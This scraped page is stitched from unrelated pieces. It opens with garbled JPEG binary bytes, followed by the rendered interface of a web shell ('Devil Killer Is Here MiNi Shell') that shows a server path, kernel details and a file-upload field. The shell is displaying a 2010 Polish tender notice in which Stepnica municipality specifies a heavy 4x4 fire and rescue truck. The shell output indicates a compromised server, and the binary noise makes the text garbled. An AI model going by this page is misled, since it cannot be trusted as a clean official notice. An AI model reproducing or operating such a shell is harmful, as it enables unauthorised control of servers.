JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/105147-N-2010.html

<p class="kh_header"><b>Stepnica: Zakup ciężkiego samochodu ratowniczo- gaśniczego</b><br>
<b>Numer ogłoszenia: 105147 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stepnica , ul. Kościuszki 4, 72-112 Stepnica, woj. zachodniopomorskie, tel. 091 4188521, faks 091 4188580.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup ciężkiego samochodu ratowniczo- gaśniczego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymagania szczegółowe na ciężki samochód ratowniczo - gaśniczy 4X4

L.p.	Wyszczególnienie	Minimalne wymagania	Spełnienie wymagań 
1	2	3	4
1	Wymagania ogólne
1.1	Pojazd musi spełniać wymagania ustawy Prawo o ruchu drogowym oraz przepisów powiązanych, odnoszących się do pojazdów straży pożarnej uprzywilejowanych i specjalnych.		
1.2	Pojazd oraz wyposażenie muszą spełniać wymagania zawarte w Rozporządzeniu MSWiA z dnia 20 czerwca 2007r. w sprawie wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów użytkownikowi Dz. U. Nr 143, poz. 1002 zwanego dalej rozporządzeniem. Pojazd i wyposażenie na dzień odbioru technicznego powinien posiadać dopuszczenie do stosowania w ochronie przeciwpożarowej. 		
1.3	Pojazd musi odpowiadać Polskiej Normie PN-EN 1846-2 oraz PN-EN 1846-3. Maksymalna masa rzeczywista samochodu gotowego do akcji ratowniczo - gaśniczej pojazd z załogą, pełnymi zbiornikami, zabudową i wyposażeniem nie może przekroczyć 22 000 kg.		
1.4	Pojazd  4X4  powinien spełniać następujące wymagania i posiadać następujące wyposażenie podstawowe:
-   nadwozie z kabiną i zabudową w kolorze czerwonym - RAL 3000 lub podobnym,
-	żaluzje skrytek w kolorze srebrnym,
-	błotniki i zderzaki w kolorze białym - RAL 9010 lub podobnym,
-	podwozie rama w kolorze czarnym,
-	urządzenia sygnalizacyjno - ostrzegawcze, akustyczne i świetlne pojazdu  uprzywilejowanego w ruchu:
- wzmacniacz sygnałowy o moc. wyjściowej min. 200W z min. 3 modulowanymi sygnałami dwutonowymi + dodatkowy sygnał tzw. Horn. Zmiana modulacji poprzez klakson pojazdu razem z sygnałem Horn. Urządzenie akustyczne winno umożliwiać podawanie komunikatów słownych. 
- dwa głośniki kompaktowe o mocy 100W każdy,
-	pneumatyczny sygnał akustyczny z możliwością sterowania przez kierowcę bądź  dowódcę - uruchamiany oddzielnym włącznikiem,
-	belkę sygnalizacyjną z dwoma niebieskimi, stroboskopowymi sygnałami błyskowymi i napisem STRAŻ, montowaną na dachu kabiny pojazdu oraz  pojedynczą lampę stroboskopową niebieską po lewej stronie z tyłu pojazdu,
-	dodatkowe dwie stroboskopowe lampy sygnalizacyjne niebieskie z przodu pojazdu,
-   wszystkie lampy ostrzegawcze oraz głośnik zabezpieczone metalowymi siatkami przed ewentualnymi uszkodzeniami mechanicznymi,
-	wszystkie lampy drogowe, halogenowe oraz kierunkowskazy zabezpieczone siatkami przed ewentualnymi uszkodzeniami mechanicznymi,
-	poprzez przyłączeniowe gniazdo elektryczne powinna istnieć możliwość zasilania i  sterowania niebieskiej lampy sygnalizacyjnej przyczepy uprzywilejowanej w ruchu ciągnionej przez pojazd.		
1.5	Pojazd powinien być oznakowany numerami operacyjnymi na podstawie wytycznych KG PSP konkretny numer zostanie podany w trakcie realizacji zamówienia.		
1.6	Pojazd musi dodatkowo spełniać następujące wymagania:
- musi być wydany z pełnym zbiornikiem paliwa,
- musi być zarejestrowany na czas określony nie krótszy niż 30 dni od dnia ich  wydania faktycznego, 
- musi być ubezpieczony w zakresie odpowiedzialności cywilnej i auto casco  na czas 
  nie krótszy niż 48 godzin od momentu wydania faktycznego pojazdu 
  Zamawiającemu z zapewnieniem takich warunków ubezpieczenia aby od momentu przejścia własności na Zamawiającego, Zamawiający był uprawniony do odbioru odszkodowania od ubezpieczyciela,		
2	Podwozie z kabiną
2.1	Podać bilans masowy pojazdu z wyszczególnieniem na:
- masę całkowitą pojazdu z załogą, pełnymi zbiornikami i wyposażeniem
- masę własną pojazdu,
- masę wyposażenia,
- naciski na osie pojazdu
- obciążenia strony lewej i prawej pojazdu	
	
2.2	Całkowita wysokość pojazdu	maks. 3150 mm	
2.3	Najmniejsze prześwity	min. 300 mm 	
2.4	Najmniejszy prześwit pod osiami	min. 250 mm 	
2.5	Kąt natarcia i zejścia 	min. 230 -230	
2.6	Masowy wskaźnik mocy określony dla masy rzeczywistej MMR pojazdu podanej w świadectwie homologacji	min. 12 kW/t	
2.7	Rezerwa masy pomiędzy MMR a DMC liczona w stosunku do DMC.	min. 5%	
2.8	Parametry określone pkt 2  jeżeli dotyczą podać dla MMR przy nominalnym ciśnieniu powietrza w ogumieniu 
2.9	Podwozie pojazdu musi posiadać świadectwo homologacji typu, które należy załączyć do oferty. W przypadku przekroczenia dopuszczalnych parametrów świadectwo homologacji na cały pojazd wraz z zabudową. Podwozie pojazdu wyposażone w:
-	silnik, kabina i podwozie pojazdu od jednego producenta należy podać markę i model pojazdu,
-	silnik o zapłonie samoczynnym, spełniający normę min. EURO 4, bez konieczności  stosowania dodatkowych płynów, w celu spełnienia norm czystości spalin,
-	przystawkę odbioru mocy do zasilania urządzeń zewnętrznych w wersji fire tender typowej dla pojazdów strażackich opcji o podwyższonych parametrach,  (zastosowana przystawka umożliwia pracę zasilanych przez nią urządzeń również  podczas jazdy samochodu z prędkością do 30 km/h.,
-	silnik o mocy  265-294 kW,
-	zsynchronizowaną skrzynię biegów, 
-	napęd 4 x 4 , możliwość blokowania mechanizmów różnicowych międzykołowych i  międzymostowych,
-   na osiach przedniej oraz tylnych koła  nisko-profilowe .
-	ogumienie uniwersalne z bieżnikiem terenowym, dostosowane do  zmiennych warunków atmosferycznych wielosezonowe,
-   pełnowymiarowe koło zapasowe przewożone na pojeździe należy podać zastosowany typ, rozmiar i markę ogumienia,
-	układ kontroli hamowania ABS lub równoważny,
-	układ kierowniczy samochodu ze wspomaganiem hydraulicznym,
-	zaczep holowniczy służący do holowania przyczep o dopuszczalnej masie całkowitej do 10 t ze złączami pneumatycznymi i elektrycznymi oraz  zaczep  kulowy do przyczepek jednoosiowych,
-   złącza elektryczne przystosowane do ciągnięcia wszystkich przyczep dopuszczonych do ruchu drogowego dopuszczalne jest zastosowanie przejściówek;  
-	zaczepy holownicze z przodu i z tyłu umożliwiające odholowanie,
-	szekle do mocowania lin do wyciągania pojazdu,
-	instalację z zaworem zwrotnym, zakończoną szybkozłączem, do uzupełnienia z   zewnętrznego źródła  powietrza w układzie pneumatycznym,
-	konstrukcja zawieszenia ze względu na stałe obciążenie powinna być  wzmocniona, w sposób, zapewniający pracę pojazdu bez uszkodzeń we wszystkich warunkach eksploatacji przewidzianych przez producenta należy podać zastosowane rozwiązania wzmocnień,
-  miernik zużycia paliwa,
-   pobór powietrza wyprowadzony do wysokości kabiny pojazdu zabezpieczony przed zassaniem gorących materiałów pogorzeliskowych.		
2.10
2.11
	Kabina:
-	czterodrzwiowa, modułowa, sześcioosobowa z układem siedzeń usytuowanych przodem do kierunku jazdy,
-	zapewniająca dostęp do silnika, podnoszona.
-	powierzchnia podłogi kabiny w wykonaniu antypoślizgowym.
Wyposażenie kabiny
-	fotele wyposażone w bezwładnościowe pasy bezpieczeństwa i zagłówki, z regulacją, odległości i pochylenia oparcia, a dla kierowcy dodatkowo z regulacją wysokości oraz tłumieniem drgań. Wszystkie fotele wykonane z materiałów łatwych w utrzymaniu w czystości, nienasiąkliwych, odpornych na ścieranie i antypoślizgowych,
- indywidualne oświetlenie nad siedzeniem dowódcy,
- niezależny układ ogrzewania i wentylacji, umożliwiający ogrzewanie kabiny przy wyłączonym silniku,
- reflektor ręczny szperacz zasilany z instalacji elektrycznej pojazdu do oświetlenia  numerów budynków zainstalowany w kabinie,
-manometr niskiego ciśnienia podłączony po stronie tłocznej autopompy,
- wskaźnik poziomu wody i środka pianotwórczego w zbiorniku,
- wskaźniki kontroli i ostrzegania urządzenia zbliżeniowego cofania kamera  cofania,
- radiotelefon przewoźny dopuszczony do stosowania w sieci PSP w zakresie częstotliwości VHF 136-174 MHz, moc 1-25 W, odstęp międzykanałowy 12,5 kHz,   nie mniej niż 100 kanałów - 1szt.,
- antena ? , umieszczona na dachu kabiny przystosowana do pracy w paśmie 149 MHz,
- radiotelefony przenośne dopuszczone do stosowania w sieci PSP w zakresie częstotliwości VHF 136-174 MHz, moc 1-5 W, odstęp międzykanałowy 12,5 kHz,  nie mniej niż 100 kanałów z ładowarkami podłączonymi do instalacji elektrycznej samochodu - 4 szt.,
-	latarki elektryczne indywidualne w wykonaniu EX z ładowarkami podłączonymi do instalacji elektrycznej samochodu typ SURVIVOR SL 90 X (lub równoważne)-6 szt.,
-   integralny układ prostowniczy do ładowania akumulatorów z zewnętrznego źródła  230 V (LEAB typ Champ II 2408 lub równoważny), gniazdo przyłączeniowe umieszczone po lewej stronie (w kabinie kierowcy świetlna i dźwiękowa sygnalizacja podłączenia do zewnętrznego źródła),
-  uchwyty do mocowania 4  szt. aparatów oddechowych zamontowanych w przedziale kabiny  w oparcie siedzenia   4 szt. przedział strażacki wraz z systemem ułatwiającym założenie aparatów (AUER BD 96, kompozyt) + miejsce na 5 szt. butli zapasowych w skrytce.	
2.12	Pojazd musi być wyposażony w sygnalizację świetlną i dźwiękową (brzęczyk - sygnał przerywany) włączonego biegu wstecznego (jako sygnaliację świetlną dopuszcza się światło cofania) oraz w instalację kontroli i ostrzegania zbliżeniowego podczas cofania.		
2.13	Instalacja elektryczna pojazdu musi być wyposażona w główny wyłącznik prądu, wyłączający wszystkie odbiorniki.		
2.14	Pojazd wyposażony w podgrzewane i elektrycznie sterowane lusterka		
3	Zabudowa pożarnicza
3.1	Zabudowa wykonana z materiału niekorodującego.		
3.2	Dach zabudowy w formie podestu roboczego w wykonaniu antypoślizgowym umożliwiającego pracę załogi oraz przewidzianego do mocowania sprzętu  , podświetlony w warunkach nocnych.		
3.3	Skrytki na sprzęt i wyposażenie zamykane żaluzjami wodo i pyłoszczelnymi, wspomaganymi systemem ułatwiającym otwieranie i zabezpieczającym przed samoczynnym zamykaniem, wykonane z materiałów odpornych na korozję, wyposażone w zamki zamykane na jeden klucz  podświetlane lampami ledowymi.		
3.4	Zlokalizowany z tyłu pojazdu przedział autopompy wyposażony w głośnik z mikrofonem współpracujący z radiotelefonem przewoźnym, umożliwiający prowadzenie korespondencji z przedziału autopompy. 
Działko wodno - pianowe o regulowanej wydajności 1600 - 3200 dm3/min z prądownicą piany z możliwością wykorzystania jako działko przenośne + statyw.		
3.5	Autopompa dwuzakresowa, wykonana z brązu, o parametrach od 3600-4000 dm3/min. przy ciśnieniu 0,8 MPa (dla głębokości ssania 1,5 m) i 2000 dm3/min. przy ciśnieniu 0,8 MPa (dla głębokości ssania 7,5 m) oraz min. 200 dm3/min. przy ciśnieniu 4 MPa (dla głębokości ssania 1,5 m)   wraz z układem wodno-pianowym wyposażonym w system sterowania umożliwiający:
-	regulację automatyczną i ręczną ciśnienia pracy,
-	ręczne  dozowanie środka pianotwórczego w całym zakresie pracy autopompy umożliwiające uzyskanie stężeń w zakresie od 1% - 6% (w przypadku zastosowania zdalnego sterowania zaworami układu wodno - pianowego, każdy z zaworów musi posiadać możliwość przesterowania ręcznego, 
- automatyczny układ utrzymywania stałego ciśnienia.
Autopompa umożliwiająca podanie wody i wodnego roztworu środka pianotwórczego do:
- czterech nasad tłocznych STORZ 75 z zaworami i zaślepieniami zlokalizowanych 
   symetrycznie po bokach z tyłu pojazdu(2x2)za, umieszczonych w skrytkach  z nadmuchem ciepłego powietrza,
- działko wodno - pianowe o regulowanej wydajności 1600 - 3200 dm3/min, przy ciśnieniu 8 bar, 
Autopompa wyposażona w system ogrzewania płaszczem wodnym, podłączony do układu chłodzenia silnika z możliwością wyłączenia ogrzewania w okresie letnim.		
3.6	W przedziale autopompy powinny znajdować się, co najmniej następujące urządzenia kontrolno - sterownicze pracy pompy:
-	manowakuometr,
-	manometr niskiego ciśnienia,
-	manometr wysokiego ciśnienia,
-	wskaźnik poziomu wody w zbiorniku samochodu,
-	wskaźnik poziomu środka pianotwórczego w zbiorniku,
-	wskaźnik prędkości obrotowej wału pompy,
-	regulator prędkości obrotowej silnika pojazdu,
-	układ nastawczy stężenia środka pianotwórczego, sterowany ręcznie, 
-	wyłącznik silnika pojazdu,
-	licznik motogodzin pracy autopompy,
-	kontrolki ciśnienia oleju i temperatury cieczy chłodzącej silnika.		
3.7	Samochód powinien być wyposażony w dwie nasady zasilające STORZ 75 z zaworami i zaślepieniami zlokalizowane symetrycznie po bokach z tyłu pojazdu, dwie ssawne STORZ 110 z zaślepieniami z tyłu pojazdu oraz jedną nasad  ssawną STORZ 52 z zaślepieniem do zassania środka pianotwórczego ze zbiornika zewnętrznego.
Układ wodny powinien umożliwić zasilanie własne poprzez nasadę STORZ 75. Średnica przewodu łączącego nasadę ssawną ze zbiornikiem powinna wynosić min. 75 mm.		
3.8	Na wlocie ssawnym pompy musi być zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i do zbiornika własnego pojazdu, gwarantujący bezpieczną eksploatację autopompy.		
3.9	Zbiornik wody o pojemności min. 5000 dm3 wykonany z materiału kompozytowego. Zbiornik musi być wyposażony w oprzyrządowanie umożliwiające jego bezpieczną eksploatację, z układem zabezpieczającym przed wypływem wody w czasie jazdy. Zbiornik powinien posiadać właz rewizyjny; nadciśnienie testowe 20 kPa. Układ napełniania zbiornika wody musi być wyposażony w automatyczny układ zabezpieczający przed przepełnieniem zbiornika z możliwością przełączenia na pracę ręczną.		
3.10	Zbiornik środka pianotwórczego wykonany z materiału odpornego na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów, o pojemności co najmniej 10% pojemności zbiornika wody (napełnianie zbiornika środkiem pianotwórczym powinno być możliwe z poziomu terenu i z dachu pojazdu).
Pojazd należy wyposażyć dodatkowo w pompę elektryczną do napełniania zbiornika środka pianotwórczego z nasadą wielkości 52.		
3.11
	Jedna linia szybkiego natarcia wysokiego ciśnienia (długość od 60-80 mb) na zwijadle, zakończona prądownicą typu turbojet wodno - pianową o regulowanej wydajności z możliwością podawania prądu zwartego i rozproszonego, umieszczone z prawej strony, w tylnej części zabudowy pożarniczej samochodu.
System rozwijania i zwijania węża wyposażony w dwa niezależne napędy pneumatyczny(elektryczny) i mechaniczny (ręczny). Układ napędu  pneumatycznego zasilany z układu pneumatycznego pojazdu.		
3.12	Konstrukcja układu wodno - pianowego powinna umożliwić jego całkowite
odwodnienie.
Opróżnianie zbiornika wodnego również poprzez wolny wylew bez pracy autopompy. 		
3.13	Wbudowana tablica rozdzielcza z gniazdami zasilającymi (min. 2x230 V i min. 1x400V).  Stopień ochrony IP54. Agregat wyposażony dodatkowo w system zewnętrznego zasilania paliwem z kanistra 20 l poprzez zaciskowy wąż elastyczny. Spaliny odprowadzane wężem o dł. min 1,5m. W skrytce przygotowane miejsce na agregat 2,2 kV. 
Tablica kontrolno - sterująca agregatu i masztu oświetleniowego umieszczona w pierwszej skrytce za kierowcą.
Oświetlenie zewnętrzne wokół pojazdu  winne stanowić  4 halogeny ledowe  z obu stron pojazdu ,tył 1 szt.		
3.14	Wysuwany pneumatycznie, obrotowy maszt oświetleniowy podłączony do agregatu prądotwórczego, zabudowany na stałe w samochodzie z najaśnicami o łącznej mocy min. 2000 W. Wysokość min. 6,5 m od podłoża, na którym stoi pojazd, z możliwością sterowania najaśnicami w pionie i w poziomie. Stopień ochrony reflektorów masztu min. IP 55. Umiejscowienie masztu nie powinno kolidować z działkiem wodno - pianowym. Głowica masztu powinna być wyposażona w podstawę stabilizującą jej położenie w pozycji transportowej. Sterowanie masztem i najaśnicami za pomocą sterownika - pilota na przewodzie o dł. min. 200 cm. 		
3.15	Reflektor pogorzeliskowy (szperacz) z 30 metrowym przedłużaczem i statywem. Uchwyt do reflektora zamontowany na zewnątrz z prawej strony kabiny.		
3.16	Miejsce do przewożenia 3 szt. węży ssawnych 110 z łącznikami do wysokości 2,4 m + pływak 		
3.17	Pojazd wyposażony w wyciągarkę o napędzie elektrycznym 24V, umieszczoną z  przodu  pojazdu w miejscu haka holowniczego. Min. siła uciągu wyciągarki 60 kN z zabezpieczeniem przeciążeniowym. Lina dł. min 30 m. Wyciągarka wyposażona w układ sterowania, hamulec elektryczny, rolkową prowadnicę liny, napinacz liny i dodatkowe zblocze  z pilotem.
Przód  oraz tył  pojazdu  orurowany zabezpieczający pojazd  w działaniach  pożarów  leśnych 		
4	Informacje dodatkowe.
4.1	Dołączyć rysunki poglądowe pojazdu (boki, przód, tył oraz dach pojazdu) z wymiarami. Propozycję rozmieszczenia sprzętu w pojeździe.
4.2	Dołączyć schematy układów:
- wodno - pianowego,
- elektrycznych,
- pneumatycznych,
- hydraulicznych
4.3	Dołączyć opisy wyposażenia skrytek, urządzeń sterowniczych, instrukcje obsługi wszystkich urządzeń i sprzętu w języku polskim (możliwość dostarczenia przedmiotowych opisów oraz instrukcji najpóźniej w dniu inspekcji techniczno - jakościowej)
	
4.4	Min. warunki gwarancji zgodnie z zapisami siwz.
	
	
4.5	Dodatkowo:
-osłona przednia rurowa,
- zraszacze podwozia,
- mocowanie na drabinę aluminiową D10W,
- mocowanie na bosak,
-mocowanie na wytwornicę pianową.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9, 34.14.42.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

